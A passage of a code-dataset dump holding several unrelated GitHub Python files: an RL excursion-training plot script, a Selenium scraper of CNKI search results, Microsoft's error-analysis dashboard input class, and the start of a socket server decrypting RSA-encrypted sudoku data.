initial_entropy\nagent3.analyser.average_entropy = initial_entropy\nprint(\"Initial return: %s\"%(initial_return))\ninitial_samples = agent1.samples(50)\n\nmin_y = np.min(np.array(initial_samples)[:,:,0]) - 1\nmax_y = np.max(np.array(initial_samples)[:,:,0]) + 1\n\nepisodes = 20000\nagent1.train(episodes)\nagent2.train(episodes)\nagent3.train(episodes)\n\nevals = 1000\nagent1.evaluate(evals)\nagent2.evaluate(evals)\nagent3.evaluate(evals)\nfinal_return1 = agent1.average_return\nfinal_return2 = agent2.average_return\nfinal_return3 = agent3.average_return\nprint(\"Initial return: %s, agent1's final return: %s, agent2's final return: %s, agent3's final return: %s\"\n%(initial_return, final_return1, final_return2, final_return3))\nsamples1 = agent1.samples(50)\nsamples2 = agent2.samples(50)\nsamples3 = agent3.samples(50)\n\ntraj_len = environment_parameters['trajectory_length']\nplot_end = traj_len + 1\n\nup_probabilities1 = 1/(1+np.exp(-agent1.policy.table))\nstate_probabilities1 = excursions.state_probabilities(up_probabilities1, traj_len)\nup_probabilities2 = 1/(1+np.exp(-agent2.policy.table))\nstate_probabilities2 = excursions.state_probabilities(up_probabilities2, traj_len)\nup_probabilities3 = 1/(1+np.exp(-agent3.policy.table))\nstate_probabilities3 = excursions.state_probabilities(up_probabilities3, traj_len)\n\ninitial_data = [np.array(initial_samples)[:,:,0].T,\n\t\t\t\tinitial_return,\n\t\t\t\tinitial_success,\n\t\t\t\tinitial_entropy]\nagent1_data = [agent1.returns, \n\t\t\t agent1.average_returns, \n\t\t\t agent1.analyser.successes, \n\t\t\t agent1.analyser.entropies,\n\t\t\t np.array(samples1)[:,:,0].T,\n\t\t\t agent1.policy.table,\n\t\t\t state_probabilities1,\n\t\t\t final_return1,\n\t\t\t agent1.analyser.average_success,\n\t\t\t agent1.analyser.average_entropy]\nagent2_data = [agent2.returns, \n\t\t\t agent2.average_returns, \n\t\t\t agent2.analyser.successes, \n\t\t\t agent2.analyser.entropies,\n\t\t\t np.array(samples2)[:,:,0].T,\n\t\t\t agent2.policy.table,\n\t\t\t state_probabilities2,\n\t\t\t final_return2,\n\t\t\t agent2.analyser.average_success,\n\t\t\t agent2.analyser.average_entropy,\n\t\t\t agent2.values.table]\nagent3_data = [agent3.returns, \n\t\t\t agent3.average_returns, \n\t\t\t agent3.analyser.successes, \n\t\t\t agent3.analyser.entropies,\n\t\t\t np.array(samples3)[:,:,0].T,\n\t\t\t agent3.policy.table,\n\t\t\t state_probabilities3,\n\t\t\t final_return3,\n\t\t\t agent3.analyser.average_success,\n\t\t\t agent3.analyser.average_entropy,\n\t\t\t agent3.values.table]\n\nsave_initial = False\nif save_initial:\n\tinitial_name = (\"data/tl%s_pb%s_tb%s_data\"%(\n\t\tenvironment_parameters['trajectory_length'],\n\t\tenvironment_parameters['positivity_bias'],\n\t\tenvironment_parameters['target_bias']))\n\tnp.save(initial_name, initial_data)\n\nsave = False\nif save:\n\tshared_name = (\"data/tl%s_pb%s_tb%s_rl%s_sl%s_el%s\"%(\n\t\tenvironment_parameters['trajectory_length'],\n\t\tenvironment_parameters['positivity_bias'],\n\t\tenvironment_parameters['target_bias'],\n\t\talgorithm_parameters1['return_learning_rate'],\n\t\tsuccess_learning_rate,\n\t\tentropy_learning_rate))\n\tagent1_name = (\"_%spl_%sAlg_\"%(\n\t\tagent1.policy.learning_rate,\n\t\t'mc'))\n\tagent2_name = (\"_%spl_%svl_%sAlg_\"%(\n\t\tagent2.policy.learning_rate,\n\t\tagent2.values.learning_rate,\n\t\t'mcvb'))\n\tagent3_name = (\"_%spl_%svl_%sAlg_\"%(\n\t\tagent3.policy.learning_rate,\n\t\tagent3.values.learning_rate,\n\t\t'ac'))\n\tnp.save(shared_name + agent1_name + \"data\", agent1_data)\n\tnp.save(shared_name + agent2_name + \"data\", agent2_data)\n\tnp.save(shared_name + agent3_name + \"data\", agent3_data)\n\nplt.figure(figsize = (12, 9.5))\n\nplt.subplot(331)\nplt.plot(agent3.average_returns, c = 'g')\nplt.plot(agent1.average_returns, c = 'b')\nplt.plot(agent2.average_returns, c = 'm')\nplt.xlabel(\"Episode\")\nplt.ylabel(\"Running return\")\n\nplt.subplot(332)\nplt.plot(agent3.analyser.successes, c = 'g')\nplt.plot(agent1.analyser.successes, c = 'b')\nplt.plot(agent2.analyser.successes, c = 'm')\nplt.xlabel(\"Episode\")\nplt.ylabel(\"Successes\")\n\nplt.subplot(333)\nplt.plot(agent3.analyser.entropies, c = 'g')\nplt.plot(agent1.analyser.entropies, c = 'b')\nplt.plot(agent2.analyser.entropies, c = 'm')\nplt.xlabel(\"Episode\")\nplt.ylabel(\"Entropy\")\n\nplt.subplot(334)\nplt.plot(np.array(initial_samples)[:,:,0].T, c = 'k', alpha = 0.2)\nplt.plot(np.array(samples1)[:,:,0].T, c = 'b', alpha = 0.2)\nplt.scatter([environment_parameters['trajectory_length']], \n\t\t\t[0], c = 'k', marker = 'o', s = 80)\nplt.plot([-1, plot_end], [0, 0], lw = 2, c = 'r', ls = '--', alpha = 0.3)\nplt.fill_between([-1, plot_end], [0, 0], [min_y, min_y], color = 'r', alpha = 0.1)\nplt.xlim(-1, plot_end)\nplt.ylim(min_y, max_y)\nplt.title(\"Agent 1\")\nplt.xlabel(\"Time\")\nplt.ylabel(\"Position\")\n\nplt.subplot(335)\nplt.plot(np.array(initial_samples)[:,:,0].T, c = 'k', alpha = 0.2)\nplt.plot(np.array(samples2)[:,:,0].T, c = 'm', alpha = 0.2)\nplt.scatter([environment_parameters['trajectory_length']], \n\t\t\t[0], c = 'k', marker = 'o', s = 80)\nplt.plot([-1, plot_end], [0, 0], lw = 2, c = 'r', ls = '--', alpha = 0.3)\nplt.fill_between([-1, plot_end], [0, 0], [min_y, min_y], color = 'r', alpha = 0.1)\nplt.xlim(-1, plot_end)\nplt.ylim(min_y, max_y)\nplt.title(\"Agent 2\")\nplt.xlabel(\"Time\")\n\nplt.subplot(336)\nplt.plot(np.array(initial_samples)[:,:,0].T, c = 'k', alpha = 0.2)\nplt.plot(np.array(samples3)[:,:,0].T, c = 'g', alpha = 0.2)\nplt.scatter([environment_parameters['trajectory_length']], \n\t\t\t[0], c = 'k', marker = 'o', s = 80)\nplt.plot([-1, plot_end], [0, 0], lw = 2, c = 'r', ls = '--', alpha = 0.3)\nplt.fill_between([-1, plot_end], [0, 0], [min_y, min_y], color = 'r', alpha = 0.1)\nplt.xlim(-1, plot_end)\nplt.ylim(min_y, max_y)\nplt.title(\"Agent 3\")\nplt.xlabel(\"Time\")\n\n\"\"\"\nplt.subplot(337)\nplt.pcolor(np.concatenate((up_probabilities3[traj_len + 1 : 2*traj_len + 1],\n\t\t\t\t\t\t up_probabilities3[0 : traj_len + 1])))\nplt.colorbar()\n\nplt.subplot(338)\nplt.pcolor(state_probabilities3)\nplt.colorbar()\n\nplt.subplot(339)\nplt.pcolor(np.concatenate((agent3.values.table[traj_len + 1 : 2*traj_len + 1],\n\t\t\t\t\t\t agent3.values.table[0 : traj_len + 1])))\nplt.colorbar()\n\"\"\"\n\nplt.show()","repo_name":"JamieMair/rledts","sub_path":"tabular_excursions/excursion_data.py","file_name":"excursion_data.py","file_ext":"py","file_size_in_byte":8297,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"26189542228","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.common.exceptions import TimeoutException\r\nimport time\r\nfrom pyquery import PyQuery as pq\r\nimport os\r\nimport csv\r\n\r\nuser_input = str(input('请输入要检索的关键词:\\n'))\r\nMAX_PAGE = 17\r\nbrowser = webdriver.PhantomJS()\r\nwait = WebDriverWait(browser, 6)\r\nurl = 'https://kns.cnki.net/kns/brief/default_result.aspx'\r\nbrowser.get(url)\r\ninput = wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, 'div.research input')))\r\ninput.send_keys(user_input)\r\ninput.send_keys(Keys.ENTER)\r\nbrowser.switch_to.frame('iframeResult')\r\ndef get_index_page(page):\r\n print('正在爬取%d页'%(page))\r\n if page>1:\r\n try:\r\n next = wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR,'div.TitleLeftCell a:last-child')))\r\n next.click()\r\n except TimeoutException:\r\n get_index_page(page)\r\n wait.until(EC.text_to_be_present_in_element((By.CSS_SELECTOR, 'div.TitleLeftCell font.Mark'), str(page)))\r\n parse_page(page)\r\ndef parse_page(page):\r\n html = browser.page_source\r\n doc = pq(html)\r\n # 一个生成器\r\n tr_list = doc('table.GridTableContent tbody tr').items()\r\n for tr in tr_list:\r\n # 文章标题\r\n title = tr.find('a.fz14').text().replace('\\n', '')\r\n if title =='':\r\n continue\r\n # 作者\r\n author = tr.find('td.author_flag').text()\r\n # 来源------选择target='_blank'和href属性中包含ridge子串所有节点。\r\n source = tr.find('a[target=_blank][href*=\"ridge\"]').text()\r\n # 发表时间-----选择align='center'的所有节点。\r\n data = tr.find('td[align=center]').text().split(' ')[0]\r\n # 被引量\r\n KnowledgeNetcont = tr.find('span.KnowledgeNetcont a').text()\r\n if KnowledgeNetcont=='':\r\n KnowledgeNetcont = KnowledgeNetcont.replace('','0')\r\n # 下载量\r\n downloadCount = tr.find('span.downloadCount a').text()\r\n if downloadCount=='':\r\n downloadCount = downloadCount.replace('','0')\r\n\r\n item = {\r\n 'title':title,\r\n 'author':author,\r\n 'source':source,\r\n 'data':data,\r\n 'KnowledgeNetcont':KnowledgeNetcont,\r\n 'downloadCount':downloadCount,\r\n }\r\n save(item)\r\n print('保存第%d页成功'%(page))\r\n\r\ndef save(item):\r\n '''\r\n 进行判断,如果文件第一次写入就加上字段头,如果不是就不加,防止文件重复写头。\r\n :param item: 解析的内容\r\n :return: 保存的CSV文件\r\n '''\r\n if os.path.exists('%s.csv' %(user_input)):\r\n with open('%s.csv' %(user_input), 'a', encoding='utf-8') as csvfile:\r\n fieldname = ['title', 'author', 'source', 'data', 'KnowledgeNetcont', 'downloadCount']\r\n writer = csv.DictWriter(csvfile, fieldname)\r\n writer.writerow(item)\r\n else:\r\n with open('%s.csv' %(user_input),'a',encoding='utf-8') as csvfile:\r\n fieldname = ['title', 'author', 'source', 'data', 'KnowledgeNetcont', 'downloadCount']\r\n writer = csv.DictWriter(csvfile,fieldname) #DictWriter方法使csv文件可以写入字典\r\n writer.writeheader()\r\n writer.writerow(item)\r\n\r\ndef man(MAX_PAGE):\r\n for page in range(1,MAX_PAGE):\r\n get_index_page(page)\r\n\r\nif __name__=='__main__':\r\n man(MAX_PAGE)\r\n\r\n\r\n'''\r\n本爬虫脚本在翻页时用的点击下一页的方法,因为该网站没有输入页码的输入框,\r\n无法直接输入页码获取内容,只能将检索内容的代码放入函数外,用全局变量,\r\n否则代码运行时,网站地址会被重复请求,一直获取的是第一第二页的内容,其他获取不到。\r\n希望理解!!\r\n'''","repo_name":"L-fly123456/ZhiwangSpider","sub_path":"知网spider.py","file_name":"知网spider.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18102092357","text":"import traceback\n\nimport numpy as np\nimport pandas as pd\n\nfrom erroranalysis._internal.constants import (Metrics, display_name_to_metric,\n metric_to_display_name)\nfrom erroranalysis._internal.error_analyzer import (ModelAnalyzer,\n PredictionsAnalyzer)\nfrom erroranalysis._internal.utils import is_spark\nfrom raiutils.data_processing import convert_to_list, serialize_json_safe\nfrom raiutils.models import is_classifier\nfrom responsibleai._interfaces import ErrorAnalysisData\n\nfrom .constants import ModelTask\nfrom .error_analysis_constants import (ErrorAnalysisDashboardInterface,\n MethodConstants)\nfrom .error_handling import _format_exception\nfrom .explanation_constants import (ExplanationDashboardInterface,\n WidgetRequestResponseConstants)\n\nFEATURE_NAMES = ExplanationDashboardInterface.FEATURE_NAMES\nENABLE_PREDICT = ErrorAnalysisDashboardInterface.ENABLE_PREDICT\n\n\nclass ErrorAnalysisDashboardInput:\n def __init__(\n self,\n explanation,\n model,\n dataset,\n true_y,\n classes,\n features,\n categorical_features,\n true_y_dataset,\n pred_y,\n pred_y_dataset,\n model_task,\n metric,\n max_depth,\n num_leaves,\n min_child_samples,\n sample_dataset):\n \"\"\"Initialize the ErrorAnalysis Dashboard Input.\n\n :param explanation: An object that represents an explanation.\n :type explanation: ExplanationMixin\n :param model: An object that represents a model.\n It is assumed that for the classification case\n it has a method of predict_proba() returning\n the prediction probabilities for each\n class and for the regression case a method of predict()\n returning the prediction value.\n :type model: object\n :param dataset: A matrix of feature vector examples\n (# examples x # features), the same samples\n used to build the explanation.\n Will overwrite any set on explanation object already.\n :type dataset: numpy.ndarray or list[][] or pandas.DataFrame\n :param true_y: The true labels for the provided explanation.\n Will overwrite any set on explanation object already.\n :type true_y: numpy.ndarray or list[] or pandas.Series\n :param classes: The class names.\n :type classes: numpy.ndarray or list[]\n :param features: Feature names.\n :type features: numpy.ndarray or list[]\n :param categorical_features: The categorical feature names.\n :type categorical_features: list[str]\n :param true_y_dataset: The true labels for the provided dataset.\n Only needed if the explanation has a sample of instances from the\n original dataset. Otherwise specify true_y parameter only.\n :type true_y_dataset: numpy.ndarray or list[] or pandas.Series\n :param pred_y: The predicted y values, can be passed in as an\n alternative to the model and explanation for a more limited\n view.\n :type pred_y: numpy.ndarray or list[] or pandas.Series\n :param pred_y_dataset: The predicted labels for the provided dataset.\n Only needed if providing a sample dataset for the UI while using\n the full dataset for the tree view and heatmap. Otherwise specify\n pred_y parameter only.\n :type pred_y_dataset: numpy.ndarray or list[] or pandas.Series\n :param model_task: Optional parameter to specify whether the model\n is a classification or regression model. In most cases, the\n type of the model can be inferred based on the shape of the\n output, where a classifier has a predict_proba method and\n outputs a 2 dimensional array, while a regressor has a\n predict method and outputs a 1 dimensional array.\n :type model_task: str\n :param metric: The metric name to evaluate at each tree node or\n heatmap grid. Currently supported classification metrics\n include 'error_rate', 'recall_score' for binary\n classification and 'micro_recall_score' or\n 'macro_recall_score' for multiclass classification,\n 'precision_score' for binary classification and\n 'micro_precision_score' or 'macro_precision_score'\n for multiclass classification, 'f1_score' for binary\n classification and 'micro_f1_score' or 'macro_f1_score'\n for multiclass classification, and 'accuracy_score'.\n Supported regression metrics include 'mean_absolute_error',\n 'mean_squared_error', 'r2_score', and 'median_absolute_error'.\n :type metric: str\n :param max_depth: The maximum depth of the surrogate tree trained\n on errors.\n :type max_depth: int\n :param num_leaves: The number of leaves of the surrogate tree\n trained on errors.\n :type num_leaves: int\n :param min_child_samples: The minimal number of data required\n to create one leaf.\n :type min_child_samples: int\n :param sample_dataset: Dataset with fewer samples than the main\n dataset. Used to improve performance only when an\n Explanation object is not provided. Used only if\n explanation is not specified for the dataset explorer.\n Specify less than 10k points for optimal performance.\n :type sample_dataset: pd.DataFrame or numpy.ndarray or list[][]\n \"\"\"\n self._model = model\n self._categorical_features = categorical_features\n self._string_ind_data = None\n self._categories = []\n self._categorical_indexes = []\n self._is_classifier = is_classifier(model)\n self._dataframeColumns = None\n self.dashboard_input = {}\n\n model_available = model is not None\n\n if model_available and pred_y is not None:\n raise ValueError(\n 'Only model or pred_y can be specified, not both')\n\n self.dashboard_input[ENABLE_PREDICT] = model_available\n\n self.dashboard_input[\n ExplanationDashboardInterface.IS_CLASSIFIER\n ] = self._is_classifier\n\n is_pyspark = is_spark(dataset)\n if is_pyspark:\n self.setup_pyspark(model, dataset, true_y, classes,\n features, categorical_features, true_y_dataset,\n pred_y, pred_y_dataset, model_task, metric,\n max_depth, num_leaves, min_child_samples,\n sample_dataset, model_available)\n else:\n self.setup_local(explanation, model, dataset, true_y, classes,\n features, categorical_features, true_y_dataset,\n pred_y, pred_y_dataset, model_task, metric,\n max_depth, num_leaves, min_child_samples,\n sample_dataset, model_available)\n data = self.get_error_analysis_data(max_depth,\n num_leaves,\n min_child_samples,\n self._error_analyzer.metric,\n is_pyspark)\n self.dashboard_input[\n ExplanationDashboardInterface.ERROR_ANALYSIS_DATA\n ] = data\n\n def setup_pyspark(self, model, dataset, true_y, classes,\n features, categorical_features, true_y_dataset,\n pred_y, pred_y_dataset, model_task, metric,\n max_depth, num_leaves, min_child_samples,\n sample_dataset, model_available):\n self._error_analyzer = ModelAnalyzer(model,\n dataset,\n true_y,\n features,\n categorical_features,\n model_task,\n metric,\n classes)\n sample = dataset.to_spark().limit(100)\n scored_sample = model.transform(sample)\n pd_sample = scored_sample.toPandas()\n predicted_y = pd_sample[\"prediction\"]\n predicted_y = self.predicted_y_to_list(predicted_y)\n true_y = pd_sample[true_y]\n pd_sample = pd_sample[features]\n list_dataset = convert_to_list(pd_sample)\n self.setup_visualization_input(classes, predicted_y,\n list_dataset, true_y, features)\n\n def setup_visualization_input(self, classes, predicted_y,\n list_dataset, true_y, features):\n if classes is not None:\n classes = convert_to_list(classes)\n self.dashboard_input[\n ExplanationDashboardInterface.CLASS_NAMES\n ] = classes\n class_to_index = {k: v for v, k in enumerate(classes)}\n\n if predicted_y is not None:\n # If classes specified, convert predicted_y to\n # numeric representation\n if classes is not None and predicted_y[0] in class_to_index:\n for i in range(len(predicted_y)):\n predicted_y[i] = class_to_index[predicted_y[i]]\n self.dashboard_input[\n ExplanationDashboardInterface.PREDICTED_Y\n ] = predicted_y\n\n row_length = 0\n feature_length = None\n\n if list_dataset is not None:\n row_length, feature_length = np.shape(list_dataset)\n if feature_length > 1000:\n raise ValueError(\"Exceeds maximum number of features for\"\n \" visualization (1000). Please regenerate the\"\n \" explanation using fewer features or\"\n \" initialize the dashboard without passing a\"\n \" dataset.\")\n self.dashboard_input[\n ExplanationDashboardInterface.TRAINING_DATA\n ] = serialize_json_safe(list_dataset)\n\n if true_y is not None and len(true_y) == row_length:\n list_true_y = convert_to_list(true_y)\n # If classes specified, convert true_y to numeric representation\n if classes is not None and list_true_y[0] in class_to_index:\n for i in range(len(list_true_y)):\n list_true_y[i] = class_to_index[list_true_y[i]]\n self.dashboard_input[\n ExplanationDashboardInterface.TRUE_Y\n ] = list_true_y\n\n if features is not None:\n features = convert_to_list(features)\n if feature_length is not None and len(features) != feature_length:\n raise ValueError(\"Feature vector length mismatch:\"\n \" feature names length differs\"\n \" from local explanations dimension\")\n self.dashboard_input[FEATURE_NAMES] = features\n\n def setup_local(self, explanation, model, dataset, true_y, classes,\n features, categorical_features, true_y_dataset,\n pred_y, pred_y_dataset, model_task, metric, max_depth,\n num_leaves, min_child_samples, sample_dataset,\n model_available):\n full_dataset = dataset\n if true_y_dataset is None:\n full_true_y = true_y\n else:\n full_true_y = true_y_dataset\n if pred_y_dataset is None:\n full_pred_y = pred_y\n else:\n full_pred_y = pred_y_dataset\n has_explanation = explanation is not None\n probability_y = None\n\n if has_explanation:\n if classes is None:\n has_classes_attr = hasattr(explanation, 'classes')\n if has_classes_attr and explanation.classes is not None:\n classes = explanation.classes\n dataset, true_y = self.input_explanation(explanation,\n dataset,\n true_y)\n row_length = len(dataset)\n # Only check dataset on explanation for row length bounds\n if row_length > 100000:\n raise ValueError(\n \"Exceeds maximum number of rows\"\n \"for visualization (100000)\")\n elif sample_dataset is not None:\n dataset = sample_dataset\n\n if isinstance(dataset, pd.DataFrame) and hasattr(dataset, 'columns'):\n self._dataframeColumns = dataset.columns\n self._dfdtypes = dataset.dtypes\n try:\n list_dataset = convert_to_list(dataset)\n except Exception as ex:\n ex_str = _format_exception(ex)\n raise ValueError(\n \"Unsupported dataset type, inner error: {}\".format(ex_str))\n\n if has_explanation:\n self.input_explanation_data(list_dataset, classes)\n if features is None and hasattr(explanation, 'features'):\n features = explanation.features\n\n if model_available:\n predicted_y = self.compute_predicted_y(model, dataset)\n else:\n predicted_y = self.predicted_y_to_list(pred_y)\n\n self.setup_visualization_input(classes, predicted_y,\n list_dataset, true_y, features)\n\n if model_available and is_classifier(model) and \\\n dataset is not None:\n try:\n probability_y = model.predict_proba(dataset)\n except Exception as ex:\n ex_str = _format_exception(ex)\n raise ValueError(\"Model does not support predict_proba method\"\n \" for given dataset type,\"\n \" inner error: {}\".format(ex_str))\n try:\n probability_y = convert_to_list(probability_y)\n except Exception as ex:\n ex_str = _format_exception(ex)\n raise ValueError(\n \"Model predict_proba output of unsupported type,\"\n \"inner error: {}\".format(ex_str))\n self.dashboard_input[\n ExplanationDashboardInterface.PROBABILITY_Y\n ] = probability_y\n if model_available:\n self._error_analyzer = ModelAnalyzer(model,\n full_dataset,\n full_true_y,\n features,\n categorical_features,\n model_task,\n metric,\n classes)\n else:\n # Model task cannot be unknown when passing predictions\n # Assume classification for backwards compatibility\n if model_task == ModelTask.UNKNOWN:\n model_task = ModelTask.CLASSIFICATION\n self._error_analyzer = PredictionsAnalyzer(full_pred_y,\n full_dataset,\n full_true_y,\n features,\n categorical_features,\n model_task,\n metric,\n classes)\n if self._categorical_features:\n self.dashboard_input[\n ExplanationDashboardInterface.CATEGORICAL_MAP\n ] = serialize_json_safe(self._error_analyzer.category_dictionary)\n # Compute metrics on all data cohort\n if self._error_analyzer.model_task == ModelTask.CLASSIFICATION:\n if self._error_analyzer.metric is None:\n metric = Metrics.ERROR_RATE\n else:\n metric = self._error_analyzer.metric\n else:\n if self._error_analyzer.metric is None:\n metric = Metrics.MEAN_SQUARED_ERROR\n else:\n metric = self._error_analyzer.metric\n if model_available:\n full_pred_y = self.compute_predicted_y(model, full_dataset)\n # If we don't have an explanation or model/probabilities specified\n # we can try to use model task to figure out the method\n if not has_explanation and probability_y is None:\n method = MethodConstants.REGRESSION\n if self._error_analyzer.model_task == ModelTask.CLASSIFICATION:\n if (len(np.unique(predicted_y)) > 2):\n method = MethodConstants.MULTICLASS\n else:\n method = MethodConstants.BINARY\n self.dashboard_input[\n ErrorAnalysisDashboardInterface.METHOD\n ] = method\n\n def get_error_analysis_data(self, max_depth, num_leaves,\n min_child_samples, metric,\n is_pyspark):\n data = ErrorAnalysisData()\n data.maxDepth = max_depth\n data.numLeaves = num_leaves\n data.minChildSamples = min_child_samples\n data.metric = metric_to_display_name[metric]\n if not is_pyspark:\n data.root_stats = self._error_analyzer.compute_root_stats()\n else:\n features = self.dashboard_input[FEATURE_NAMES]\n filters = []\n composite_filters = []\n self._error_analyzer.update_metric(metric)\n tree = self._error_analyzer.compute_error_tree(\n features, filters, composite_filters,\n max_depth=max_depth,\n num_leaves=num_leaves,\n min_child_samples=min_child_samples)\n data.tree = tree\n data.tree_features = features\n return data\n\n def compute_predicted_y(self, model, dataset):\n predicted_y = None\n if dataset is not None and model is not None:\n try:\n predicted_y = model.predict(dataset)\n except Exception as ex:\n ex_str = _format_exception(ex)\n msg = \"Model does not support predict method for given\"\n \"dataset type, inner error: {}\".format(\n ex_str)\n raise ValueError(msg)\n predicted_y = self.predicted_y_to_list(predicted_y)\n return predicted_y\n\n def predicted_y_to_list(self, predicted_y):\n try:\n predicted_y = convert_to_list(predicted_y)\n except Exception as ex:\n ex_str = _format_exception(ex)\n raise ValueError(\n \"Model prediction output of unsupported type,\"\n \"inner error: {}\".format(ex_str))\n return predicted_y\n\n def input_explanation(self, explanation, dataset, true_y):\n self._mli_explanations = explanation.data(-1)[\"mli\"]\n dataset_explanation = self._find_first_explanation(\n ExplanationDashboardInterface.MLI_EXPLANATION_DATASET_KEY)\n if hasattr(explanation, 'method'):\n self.dashboard_input[\n ExplanationDashboardInterface.EXPLANATION_METHOD\n ] = explanation.method\n if dataset_explanation is not None:\n if dataset is None or len(dataset) != len(true_y):\n dataset = dataset_explanation[\n ExplanationDashboardInterface.MLI_DATASET_X_KEY\n ]\n if true_y is None:\n true_y = dataset_explanation[\n ExplanationDashboardInterface.MLI_DATASET_Y_KEY\n ]\n elif len(dataset) != len(true_y):\n dataset = explanation._eval_data\n return dataset, true_y\n\n def input_explanation_data(self, list_dataset, classes):\n # List of explanations, key of explanation type is \"explanation_type\"\n local_explanation = self._find_first_explanation(\n ExplanationDashboardInterface.MLI_LOCAL_EXPLANATION_KEY)\n global_explanation = self._find_first_explanation(\n ExplanationDashboardInterface.MLI_GLOBAL_EXPLANATION_KEY)\n ebm_explanation = self._find_first_explanation(\n ExplanationDashboardInterface.MLI_EBM_GLOBAL_EXPLANATION_KEY)\n\n if local_explanation is not None:\n try:\n local_explanation[\"scores\"] = convert_to_list(\n local_explanation[\"scores\"])\n if np.shape(local_explanation[\"scores\"])[-1] > 1000:\n raise ValueError(\"Exceeds maximum number of features for \"\n \"visualization (1000). Please regenerate\"\n \" the explanation using fewer features.\")\n local_explanation[\"intercept\"] = convert_to_list(\n local_explanation[\"intercept\"])\n # We can ignore perf explanation data.\n # Note if it is added back at any point,\n # the numpy values will need to be converted to python,\n # otherwise serialization fails.\n local_explanation[\"perf\"] = None\n self.dashboard_input[\n ExplanationDashboardInterface.LOCAL_EXPLANATIONS\n ] = local_explanation\n except Exception as ex:\n ex_str = _format_exception(ex)\n raise ValueError(\n \"Unsupported local explanation type,\"\n \"inner error: {}\".format(ex_str))\n if list_dataset is not None:\n row_length, feature_length = np.shape(list_dataset)\n local_dim = np.shape(local_explanation[\"scores\"])\n if len(local_dim) != 2 and len(local_dim) != 3:\n raise ValueError(\n \"Local explanation expected to be a 2D or 3D list\")\n if len(local_dim) == 2 and (local_dim[1] != feature_length or\n local_dim[0] != row_length):\n raise ValueError(\n \"Shape mismatch: local explanation\"\n \"length differs from dataset\")\n if len(local_dim) == 3 and (local_dim[2] != feature_length or\n local_dim[1] != row_length):\n raise ValueError(\n \"Shape mismatch: local explanation\"\n \" length differs from dataset\")\n if classes is not None and len(classes) != local_dim[0]:\n raise ValueError(\"Class vector length mismatch:\"\n \"class names length differs from\"\n \"local explanations dimension\")\n if local_explanation is None and global_explanation is not None:\n try:\n global_explanation[\"scores\"] = convert_to_list(\n global_explanation[\"scores\"])\n if 'intercept' in global_explanation:\n global_explanation[\"intercept\"] = convert_to_list(\n global_explanation[\"intercept\"])\n self.dashboard_input[\n ExplanationDashboardInterface.GLOBAL_EXPLANATION\n ] = global_explanation\n except Exception as ex:\n ex_str = _format_exception(ex)\n raise ValueError(\"Unsupported global explanation type,\"\n \"inner error: {}\".format(ex_str))\n if ebm_explanation is not None:\n try:\n self.dashboard_input[\n ExplanationDashboardInterface.EBM_EXPLANATION\n ] = ebm_explanation\n except Exception as ex:\n ex_str = _format_exception(ex)\n raise ValueError(\n \"Unsupported ebm explanation type: {}\".format(ex_str))\n\n def debug_ml(self, data):\n try:\n features = data[0]\n filters = data[1]\n composite_filters = data[2]\n max_depth = data[3]\n num_leaves = data[4]\n min_child_samples = data[5]\n metric = display_name_to_metric[data[6]]\n self._error_analyzer.update_metric(metric)\n tree = self._error_analyzer.compute_error_tree(\n features, filters, composite_filters,\n max_depth=max_depth,\n num_leaves=num_leaves,\n min_child_samples=min_child_samples)\n return {\n WidgetRequestResponseConstants.DATA: tree\n }\n except Exception as e:\n print(e)\n traceback.print_exc()\n return {\n WidgetRequestResponseConstants.ERROR:\n \"Failed to generate json tree representation\",\n WidgetRequestResponseConstants.DATA: []\n }\n\n def matrix(self, features, filters, composite_filters,\n quantile_binning, num_bins, metric):\n try:\n if features[0] is None and features[1] is None:\n return {WidgetRequestResponseConstants.DATA: []}\n metric = display_name_to_metric[metric]\n self._error_analyzer.update_metric(metric)\n matrix = self._error_analyzer.compute_matrix(\n features, filters, composite_filters,\n quantile_binning, num_bins)\n return {\n WidgetRequestResponseConstants.DATA: matrix\n }\n except Exception as e:\n print(e)\n traceback.print_exc()\n return {\n WidgetRequestResponseConstants.ERROR:\n \"Failed to generate json matrix representation\",\n WidgetRequestResponseConstants.DATA: []\n }\n\n def importances(self):\n try:\n scores = self._error_analyzer.compute_importances()\n return {\n WidgetRequestResponseConstants.DATA: scores\n }\n except Exception as e:\n print(e)\n traceback.print_exc()\n return {\n WidgetRequestResponseConstants.ERROR:\n \"Failed to generate feature importances\",\n WidgetRequestResponseConstants.DATA: []\n }\n\n def on_predict(self, data):\n try:\n if self._dataframeColumns is not None:\n data = pd.DataFrame(data, columns=self._dataframeColumns)\n data = data.astype(dict(self._dfdtypes))\n if (self._is_classifier):\n model_pred_proba = self._model.predict_proba(data)\n prediction = convert_to_list(model_pred_proba)\n else:\n model_predict = self._model.predict(data)\n prediction = convert_to_list(model_predict)\n return {\n WidgetRequestResponseConstants.DATA: prediction\n }\n except Exception:\n return {\n WidgetRequestResponseConstants.ERROR:\n \"Model threw exception while predicting...\",\n WidgetRequestResponseConstants.DATA: []\n }\n\n def _find_first_explanation(self, key):\n interface = ExplanationDashboardInterface\n explanation_type_key = interface.MLI_EXPLANATION_TYPE_KEY\n new_array = [explanation for explanation\n in self._mli_explanations\n if explanation[explanation_type_key] == key]\n if len(new_array) > 0:\n return new_array[0][\"value\"]\n return None\n","repo_name":"microsoft/responsible-ai-toolbox","sub_path":"raiwidgets/raiwidgets/error_analysis_dashboard_input.py","file_name":"error_analysis_dashboard_input.py","file_ext":"py","file_size_in_byte":28086,"program_lang":"python","lang":"en","doc_type":"code","stars":1031,"dataset":"github-code","pt":"37"} +{"seq_id":"1875791687","text":"import socket\nfrom rsa import get_decrypted_message\nfrom sudoku import solved_sudoku, decrypt_sudoku\nfrom config import *\nimport json\n\ndef start_server():\n\n mySocket = socket.socket()\n mySocket.bind((HOST, PORT))\n\n mySocket.listen(1)\n conn, addr = mySocket.accept()\n print('Connection from: ' + str(addr))\n while True:\n data = conn.recv(20480).decode()\n if not data:\n break\n\n data = json.loads(data) \n print('Server: Data sent by client =>' + str(data))\n print('Server: Decrypting message..')\n \n decrypted_message = []\n for element in data:\n decrypted_element = get_decrypted_message(message=str(element))\n 